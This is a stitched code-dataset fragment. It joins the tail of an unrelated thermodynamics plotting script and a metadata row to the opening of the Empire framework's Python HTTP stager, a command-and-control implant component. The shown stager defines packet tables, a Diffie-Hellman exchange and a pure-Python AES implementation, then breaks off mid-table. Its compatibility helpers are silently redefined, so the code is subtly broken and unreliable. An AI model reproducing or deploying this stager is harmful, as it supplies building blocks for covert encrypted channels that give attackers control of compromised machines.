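# returns envelope temperatures T (K) and pressures P (Pa), plus volumes v when
# calc_v=True; the plot below rescales P to MPa.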
plt.plot(T, P*1.0e-6)
plt.plot([Tc], [Pc*1.0e-6], "ko")
plt.ylabel(r"$P$ (MPa)")
plt.xlabel(r"$T$ (K)")
plt.title("SAFT-VRQ Mie phase diagram")
plt.show()
plt.clf()
| 26.2 | 84 | 0.71883 |
0a06c5a0c7b812160d7a0ea884c2f42e4f1210d2 | 72,652 | py | Python | data/agent/stagers/http.py | lex0tanl/Empire | c8217e87cf333797eb363b782f769cc4b2f64b0b | [
"BSD-3-Clause"
] | 3 | 2018-01-05T03:59:44.000Z | 2020-02-11T03:25:46.000Z | data/agent/stagers/http.py | lex0tanl/Empire | c8217e87cf333797eb363b782f769cc4b2f64b0b | [
"BSD-3-Clause"
] | null | null | null | data/agent/stagers/http.py | lex0tanl/Empire | c8217e87cf333797eb363b782f769cc4b2f64b0b | [
"BSD-3-Clause"
] | 1 | 2018-07-31T15:57:02.000Z | 2018-07-31T15:57:02.000Z | #!/usr/bin/env python
# AES code from https://github.com/ricmoo/pyaes
# DH code directly from: https://github.com/lowazo/pyDHE
# See README.md for complete citations and sources
import copy
import sys
import struct
import os
import pwd
import hashlib
import random
import string
import hmac
import urllib2
import socket
import subprocess
from binascii import hexlify
LANGUAGE = {
'NONE' : 0,
'POWERSHELL' : 1,
'PYTHON' : 2
}
LANGUAGE_IDS = {}
for name, ID in LANGUAGE.items(): LANGUAGE_IDS[ID] = name
META = {
'NONE' : 0,
'STAGING_REQUEST' : 1,
'STAGING_RESPONSE' : 2,
'TASKING_REQUEST' : 3,
'RESULT_POST' : 4,
'SERVER_RESPONSE' : 5
}
META_IDS = {}
for name, ID in META.items(): META_IDS[ID] = name
STAGING = {
'NONE' : 0,
'STAGE0' : 1,
'STAGE1' : 2,
'STAGE2' : 3
}
STAGING_IDS = {}
for name, ID in STAGING.items(): STAGING_IDS[ID] = name
ADDITIONAL = {}
ADDITIONAL_IDS = {}
for name, ID in ADDITIONAL.items(): ADDITIONAL_IDS[ID] = name
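# --- Editor's note (added; not in the original stager): these tables mirror
# the fields of Empire's routing-packet header, and the *_IDS dicts are the
# reverse lookups, e.g. META['STAGING_REQUEST'] == 1 and
# META_IDS[1] == 'STAGING_REQUEST'.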
# Pick the strongest available random source: ssl.RAND_bytes, then
# OpenSSL.rand.bytes, falling back to os.urandom.
try:
try:
import ssl
random_function = ssl.RAND_bytes
random_provider = "Python SSL"
except (AttributeError, ImportError):
import OpenSSL
random_function = OpenSSL.rand.bytes
random_provider = "OpenSSL"
except:
random_function = os.urandom
random_provider = "os.urandom"
class DiffieHellman(object):
"""
A reference implementation of the Diffie-Hellman protocol.
By default, this class uses the 6144-bit MODP Group (Group 17) from RFC 3526.
This prime is sufficient to generate an AES 256 key when used with
a 540+ bit exponent.
"""
def __init__(self, generator=2, group=17, keyLength=540):
"""
Generate the public and private keys.
"""
min_keyLength = 180
default_generator = 2
valid_generators = [2, 3, 5, 7]
        # Sanity check for generator and keyLength
if(generator not in valid_generators):
print("Error: Invalid generator. Using default.")
self.generator = default_generator
else:
self.generator = generator
if(keyLength < min_keyLength):
print("Error: keyLength is too small. Setting to minimum.")
self.keyLength = min_keyLength
else:
self.keyLength = keyLength
self.prime = self.getPrime(group)
self.privateKey = self.genPrivateKey(keyLength)
self.publicKey = self.genPublicKey()
def getPrime(self, group=17):
"""
Given a group number, return a prime.
"""
default_group = 17
primes = {
5: 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA237327FFFFFFFFFFFFFFFF,
14: 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF,
15: 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF,
16: 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C934063199FFFFFFFFFFFFFFFF,
17:
0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C93402849236C3FAB4D27C7026C1D4DCB2602646DEC9751E763DBA37BDF8FF9406AD9E530EE5DB382F413001AEB06A53ED9027D831179727B0865A8918DA3EDBEBCF9B14ED44CE6CBACED4BB1BDB7F1447E6CC254B332051512BD7AF426FB8F401378CD2BF5983CA01C64B92ECF032EA15D1721D03F482D7CE6E74FEF6D55E702F46980C82B5A84031900B1C9E59E7C97FBEC7E8F323A97A7E36CC88BE0F1D45B7FF585AC54BD407B22B4154AACC8F6D7EBF48E1D814CC5ED20F8037E0A79715EEF29BE32806A1D58BB7C5DA76F550AA3D8A1FBFF0EB19CCB1A313D55CDA56C9EC2EF29632387FE8D76E3C0468043E8F663F4860EE12BF2D5B0B7474D6E694F91E6DCC4024FFFFFFFFFFFFFFFF,
18:
0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C93402849236C3FAB4D27C7026C1D4DCB2602646DEC9751E763DBA37BDF8FF9406AD9E530EE5DB382F413001AEB06A53ED9027D831179727B0865A8918DA3EDBEBCF9B14ED44CE6CBACED4BB1BDB7F1447E6CC254B332051512BD7AF426FB8F401378CD2BF5983CA01C64B92ECF032EA15D1721D03F482D7CE6E74FEF6D55E702F46980C82B5A84031900B1C9E59E7C97FBEC7E8F323A97A7E36CC88BE0F1D45B7FF585AC54BD407B22B4154AACC8F6D7EBF48E1D814CC5ED20F8037E0A79715EEF29BE32806A1D58BB7C5DA76F550AA3D8A1FBFF0EB19CCB1A313D55CDA56C9EC2EF29632387FE8D76E3C0468043E8F663F4860EE12BF2D5B0B7474D6E694F91E6DBE115974A3926F12FEE5E438777CB6A932DF8CD8BEC4D073B931BA3BC832B68D9DD300741FA7BF8AFC47ED2576F6936BA424663AAB639C5AE4F5683423B4742BF1C978238F16CBE39D652DE3FDB8BEFC848AD922222E04A4037C0713EB57A81A23F0C73473FC646CEA306B4BCBC8862F8385DDFA9D4B7FA2C087E879683303ED5BDD3A062B3CF5B3A278A66D2A13F83F44F82DDF310EE074AB6A364597E899A0255DC164F31CC50846851DF9AB48195DED7EA1B1D510BD7EE74D73FAF36BC31ECFA268359046F4EB879F924009438B481C6CD7889A002ED5EE382BC9190DA6FC026E479558E4475677E9AA9E3050E2765694DFC81F56E880B96E7160C980DD98EDD3DFFFFFFFFFFFFFFFFF
}
if group in primes.keys():
return primes[group]
else:
print("Error: No prime with group %i. Using default." % group)
return primes[default_group]
def genRandom(self, bits):
"""
Generate a random number with the specified number of bits
"""
_rand = 0
_bytes = bits // 8 + 8
while(len(bin(_rand))-2 < bits):
try:
_rand = int.from_bytes(random_function(_bytes), byteorder='big')
except:
_rand = int(random_function(_bytes).encode('hex'), 16)
return _rand
def genPrivateKey(self, bits):
"""
Generate a private key using a secure random number generator.
"""
return self.genRandom(bits)
def genPublicKey(self):
"""
Generate a public key X with g**x % p.
"""
return pow(self.generator, self.privateKey, self.prime)
def checkPublicKey(self, otherKey):
"""
Check the other party's public key to make sure it's valid.
Since a safe prime is used, verify that the Legendre symbol == 1
"""
if(otherKey > 2 and otherKey < self.prime - 1):
if(pow(otherKey, (self.prime - 1)//2, self.prime) == 1):
return True
return False
def genSecret(self, privateKey, otherKey):
"""
Check to make sure the public key is valid, then combine it with the
private key to generate a shared secret.
"""
if(self.checkPublicKey(otherKey) is True):
sharedSecret = pow(otherKey, privateKey, self.prime)
return sharedSecret
else:
raise Exception("Invalid public key.")
def genKey(self, otherKey):
"""
Derive the shared secret, then hash it to obtain the shared key.
"""
self.sharedSecret = self.genSecret(self.privateKey, otherKey)
# Convert the shared secret (int) to an array of bytes in network order
# Otherwise hashlib can't hash it.
try:
            # (len(bin(x)) - 2) equals x.bit_length(); the parentheses matter
            # here, and both peers must encode the shared secret identically.
            _sharedSecretBytes = self.sharedSecret.to_bytes(
                (len(bin(self.sharedSecret)) - 2) // 8 + 1, byteorder="big")
except AttributeError:
_sharedSecretBytes = str(self.sharedSecret)
s = hashlib.sha256()
s.update(bytes(_sharedSecretBytes))
self.key = s.digest()
def getKey(self):
"""
Return the shared secret key
"""
return self.key
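# --- Editor's usage sketch (added; not part of the original stager): two
# parties exchanging public keys derive the same 256-bit key, which is what
# the server side of the staging exchange relies on. The helper name below is
# hypothetical; key generation over the 6144-bit group takes a few seconds. ---
def _dh_key_agreement_self_test():
    alice = DiffieHellman()
    bob = DiffieHellman()
    alice.genKey(bob.publicKey)
    bob.genKey(alice.publicKey)
    return alice.getKey() == bob.getKey()  # expected: True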
def _compact_word(word):
return (word[0] << 24) | (word[1] << 16) | (word[2] << 8) | word[3]
def _string_to_bytes(text):
return list(ord(c) for c in text)
def _bytes_to_string(binary):
return "".join(chr(b) for b in binary)
def _concat_list(a, b):
return a + b
def to_bufferable(binary):
return binary
def _get_byte(c):
return ord(c)
# Python 3 compatibility
try:
xrange
except Exception:
xrange = range
# Python 3 supports bytes, which is already an array of integers
def _string_to_bytes(text):
if isinstance(text, bytes):
return text
return [ord(c) for c in text]
# In Python 3, we return bytes
def _bytes_to_string(binary):
return bytes(binary)
# Python 3 cannot concatenate a list onto a bytes, so we bytes-ify it first
def _concat_list(a, b):
return a + bytes(b)
def to_bufferable(binary):
if isinstance(binary, bytes):
return binary
return bytes(ord(b) for b in binary)
def _get_byte(c):
return c
def append_PKCS7_padding(data):
if (len(data) % 16) == 0:
return data
else:
pad = 16 - (len(data) % 16)
return data + to_bufferable(chr(pad) * pad)
def strip_PKCS7_padding(data):
if len(data) % 16 != 0:
raise ValueError("invalid length")
pad = _get_byte(data[-1])
if pad <= 16:
return data[:-pad]
else:
return data
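# --- Editor's note (added; not in the original source): this pair deviates
# from strict PKCS#7 on purpose: block-aligned input is left unpadded, and
# strip_PKCS7_padding returns data unchanged when the final byte is > 16.
# Round trip for a 5-byte input:
#   padded = append_PKCS7_padding(to_bufferable('hello'))   # 16 bytes, pad 0x0b
#   strip_PKCS7_padding(padded) == to_bufferable('hello')   # True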
class AES(object):
'''Encapsulates the AES block cipher.
You generally should not need this. Use the AESModeOfOperation classes
below instead.'''
# Number of rounds by keysize
number_of_rounds = {16: 10, 24: 12, 32: 14}
# Round constant words
rcon = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91]
# S-box and Inverse S-box (S is for Substitution)
S = [0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76, 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0, 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15, 0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75, 0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84, 0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf, 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8, 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2, 0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73, 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb, 0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79, 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08, 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a, 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e, 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf, 0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16]
Si = [0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb, 0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb, 0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e, 0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25, 0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92, 0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda, 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84, 0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a, 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06, 0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02, 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b, 0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73, 0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e, 0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b, 0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4, 0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f, 0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d, 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef, 0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61, 0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d]
# Transformations for encryption
T1 = [0xc66363a5, 0xf87c7c84, 0xee777799, 0xf67b7b8d, 0xfff2f20d, 0xd66b6bbd, 0xde6f6fb1, 0x91c5c554, 0x60303050, 0x02010103, 0xce6767a9, 0x562b2b7d, 0xe7fefe19, 0xb5d7d762, 0x4dababe6, 0xec76769a, 0x8fcaca45, 0x1f82829d, 0x89c9c940, 0xfa7d7d87, 0xeffafa15, 0xb25959eb, 0x8e4747c9, 0xfbf0f00b, 0x41adadec, 0xb3d4d467, 0x5fa2a2fd, 0x45afafea, 0x239c9cbf, 0x53a4a4f7, 0xe4727296, 0x9bc0c05b, 0x75b7b7c2, 0xe1fdfd1c, 0x3d9393ae, 0x4c26266a, 0x6c36365a, 0x7e3f3f41, 0xf5f7f702, 0x83cccc4f, 0x6834345c, 0x51a5a5f4, 0xd1e5e534, 0xf9f1f108, 0xe2717193, 0xabd8d873, 0x62313153, 0x2a15153f, 0x0804040c, 0x95c7c752, 0x46232365, 0x9dc3c35e, 0x30181828, 0x379696a1, 0x0a05050f, 0x2f9a9ab5, 0x0e070709, 0x24121236, 0x1b80809b, 0xdfe2e23d, 0xcdebeb26, 0x4e272769, 0x7fb2b2cd, 0xea75759f, 0x1209091b, 0x1d83839e, 0x582c2c74, 0x341a1a2e, 0x361b1b2d, 0xdc6e6eb2, 0xb45a5aee, 0x5ba0a0fb, 0xa45252f6, 0x763b3b4d, 0xb7d6d661, 0x7db3b3ce, 0x5229297b, 0xdde3e33e, 0x5e2f2f71, 0x13848497, 0xa65353f5, 0xb9d1d168, 0x00000000, 0xc1eded2c, 0x40202060, 0xe3fcfc1f, 0x79b1b1c8, 0xb65b5bed, 0xd46a6abe, 0x8dcbcb46, 0x67bebed9, 0x7239394b, 0x944a4ade, 0x984c4cd4, 0xb05858e8, 0x85cfcf4a, 0xbbd0d06b, 0xc5efef2a, 0x4faaaae5, 0xedfbfb16, 0x864343c5, 0x9a4d4dd7, 0x66333355, 0x11858594, 0x8a4545cf, 0xe9f9f910, 0x04020206, 0xfe7f7f81, 0xa05050f0, 0x783c3c44, 0x259f9fba, 0x4ba8a8e3, 0xa25151f3, 0x5da3a3fe, 0x804040c0, 0x058f8f8a, 0x3f9292ad, 0x219d9dbc, 0x70383848, 0xf1f5f504, 0x63bcbcdf, 0x77b6b6c1, 0xafdada75, 0x42212163, 0x20101030, 0xe5ffff1a, 0xfdf3f30e, 0xbfd2d26d, 0x81cdcd4c, 0x180c0c14, 0x26131335, 0xc3ecec2f, 0xbe5f5fe1, 0x359797a2, 0x884444cc, 0x2e171739, 0x93c4c457, 0x55a7a7f2, 0xfc7e7e82, 0x7a3d3d47, 0xc86464ac, 0xba5d5de7, 0x3219192b, 0xe6737395, 0xc06060a0, 0x19818198, 0x9e4f4fd1, 0xa3dcdc7f, 0x44222266, 0x542a2a7e, 0x3b9090ab, 0x0b888883, 0x8c4646ca, 0xc7eeee29, 0x6bb8b8d3, 0x2814143c, 0xa7dede79, 0xbc5e5ee2, 0x160b0b1d, 0xaddbdb76, 0xdbe0e03b, 0x64323256, 0x743a3a4e, 0x140a0a1e, 0x924949db, 0x0c06060a, 0x4824246c, 0xb85c5ce4, 0x9fc2c25d, 0xbdd3d36e, 0x43acacef, 0xc46262a6, 0x399191a8, 0x319595a4, 0xd3e4e437, 0xf279798b, 0xd5e7e732, 0x8bc8c843, 0x6e373759, 0xda6d6db7, 0x018d8d8c, 0xb1d5d564, 0x9c4e4ed2, 0x49a9a9e0, 0xd86c6cb4, 0xac5656fa, 0xf3f4f407, 0xcfeaea25, 0xca6565af, 0xf47a7a8e, 0x47aeaee9, 0x10080818, 0x6fbabad5, 0xf0787888, 0x4a25256f, 0x5c2e2e72, 0x381c1c24, 0x57a6a6f1, 0x73b4b4c7, 0x97c6c651, 0xcbe8e823, 0xa1dddd7c, 0xe874749c, 0x3e1f1f21, 0x964b4bdd, 0x61bdbddc, 0x0d8b8b86, 0x0f8a8a85, 0xe0707090, 0x7c3e3e42, 0x71b5b5c4, 0xcc6666aa, 0x904848d8, 0x06030305, 0xf7f6f601, 0x1c0e0e12, 0xc26161a3, 0x6a35355f, 0xae5757f9, 0x69b9b9d0, 0x17868691, 0x99c1c158, 0x3a1d1d27, 0x279e9eb9, 0xd9e1e138, 0xebf8f813, 0x2b9898b3, 0x22111133, 0xd26969bb, 0xa9d9d970, 0x078e8e89, 0x339494a7, 0x2d9b9bb6, 0x3c1e1e22, 0x15878792, 0xc9e9e920, 0x87cece49, 0xaa5555ff, 0x50282878, 0xa5dfdf7a, 0x038c8c8f, 0x59a1a1f8, 0x09898980, 0x1a0d0d17, 0x65bfbfda, 0xd7e6e631, 0x844242c6, 0xd06868b8, 0x824141c3, 0x299999b0, 0x5a2d2d77, 0x1e0f0f11, 0x7bb0b0cb, 0xa85454fc, 0x6dbbbbd6, 0x2c16163a]
T2 = [0xa5c66363, 0x84f87c7c, 0x99ee7777, 0x8df67b7b, 0x0dfff2f2, 0xbdd66b6b, 0xb1de6f6f, 0x5491c5c5, 0x50603030, 0x03020101, 0xa9ce6767, 0x7d562b2b, 0x19e7fefe, 0x62b5d7d7, 0xe64dabab, 0x9aec7676, 0x458fcaca, 0x9d1f8282, 0x4089c9c9, 0x87fa7d7d, 0x15effafa, 0xebb25959, 0xc98e4747, 0x0bfbf0f0, 0xec41adad, 0x67b3d4d4, 0xfd5fa2a2, 0xea45afaf, 0xbf239c9c, 0xf753a4a4, 0x96e47272, 0x5b9bc0c0, 0xc275b7b7, 0x1ce1fdfd, 0xae3d9393, 0x6a4c2626, 0x5a6c3636, 0x417e3f3f, 0x02f5f7f7, 0x4f83cccc, 0x5c683434, 0xf451a5a5, 0x34d1e5e5, 0x08f9f1f1, 0x93e27171, 0x73abd8d8, 0x53623131, 0x3f2a1515, 0x0c080404, 0x5295c7c7, 0x65462323, 0x5e9dc3c3, 0x28301818, 0xa1379696, 0x0f0a0505, 0xb52f9a9a, 0x090e0707, 0x36241212, 0x9b1b8080, 0x3ddfe2e2, 0x26cdebeb, 0x694e2727, 0xcd7fb2b2, 0x9fea7575, 0x1b120909, 0x9e1d8383, 0x74582c2c, 0x2e341a1a, 0x2d361b1b, 0xb2dc6e6e, 0xeeb45a5a, 0xfb5ba0a0, 0xf6a45252, 0x4d763b3b, 0x61b7d6d6, 0xce7db3b3, 0x7b522929, 0x3edde3e3, 0x715e2f2f, 0x97138484, 0xf5a65353, 0x68b9d1d1, 0x00000000, 0x2cc1eded, 0x60402020, 0x1fe3fcfc, 0xc879b1b1, 0xedb65b5b, 0xbed46a6a, 0x468dcbcb, 0xd967bebe, 0x4b723939, 0xde944a4a, 0xd4984c4c, 0xe8b05858, 0x4a85cfcf, 0x6bbbd0d0, 0x2ac5efef, 0xe54faaaa, 0x16edfbfb, 0xc5864343, 0xd79a4d4d, 0x55663333, 0x94118585, 0xcf8a4545, 0x10e9f9f9, 0x06040202, 0x81fe7f7f, 0xf0a05050, 0x44783c3c, 0xba259f9f, 0xe34ba8a8, 0xf3a25151, 0xfe5da3a3, 0xc0804040, 0x8a058f8f, 0xad3f9292, 0xbc219d9d, 0x48703838, 0x04f1f5f5, 0xdf63bcbc, 0xc177b6b6, 0x75afdada, 0x63422121, 0x30201010, 0x1ae5ffff, 0x0efdf3f3, 0x6dbfd2d2, 0x4c81cdcd, 0x14180c0c, 0x35261313, 0x2fc3ecec, 0xe1be5f5f, 0xa2359797, 0xcc884444, 0x392e1717, 0x5793c4c4, 0xf255a7a7, 0x82fc7e7e, 0x477a3d3d, 0xacc86464, 0xe7ba5d5d, 0x2b321919, 0x95e67373, 0xa0c06060, 0x98198181, 0xd19e4f4f, 0x7fa3dcdc, 0x66442222, 0x7e542a2a, 0xab3b9090, 0x830b8888, 0xca8c4646, 0x29c7eeee, 